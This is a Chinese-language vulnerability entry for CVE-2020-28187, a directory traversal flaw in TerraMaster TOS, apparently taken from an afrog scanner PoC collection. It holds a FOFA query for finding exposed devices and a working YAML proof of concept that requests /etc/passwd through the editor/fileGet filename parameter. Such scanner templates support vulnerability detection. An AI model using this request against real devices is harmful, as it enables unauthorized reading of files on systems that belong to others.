CVE-2020-28187: TerraMaster TOS 后台任意文件读取漏洞

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

TerraMaster TOS <= 4.2.06中的多个目录遍历漏洞允许远程身份验证的攻击者通过/tos/index.php?editor/fileGet路径下的filename参数、 /include/ajax/logtable.php路径下的Event参数和/include/core/index.php路径下的opt参数,读取文件系统中的任何文件。 TerraMaster TOS < 4.2.06 FOFA: "TerraMaster" && header="TOS"

PoC代码[已公开]

id: CVE-2020-28187

info:
  name: TerraMaster TOS 后台任意文件读取漏洞
  author: PeiQi
  severity: critical
  description: |-
    TerraMaster TOS <= 4.2.06中的多个目录遍历漏洞允许远程身份验证的攻击者通过/tos/index.php?editor/fileGet路径下的filename参数、 /include/ajax/logtable.php路径下的Event参数和/include/core/index.php路径下的opt参数,读取文件系统中的任何文件。
    TerraMaster TOS < 4.2.06 FOFA: "TerraMaster" && header="TOS"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28187
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/TerraMaster/TerraMaster%20TOS%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2020-28187.md
  tags: cve,cve2020,terramaster,fileread
  created: 2023/06/23

rules:
  r0:
    request:
      method: GET
      path: /tos/index.php?editor/fileGet&filename=../../../../../../etc/passwd
    expression: |
      response.status == 200 && response.body.bcontains(b'"code":true') && response.body.bcontains(b'../../../../../../etc/passwd')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2020/CVE-2020-28187.yaml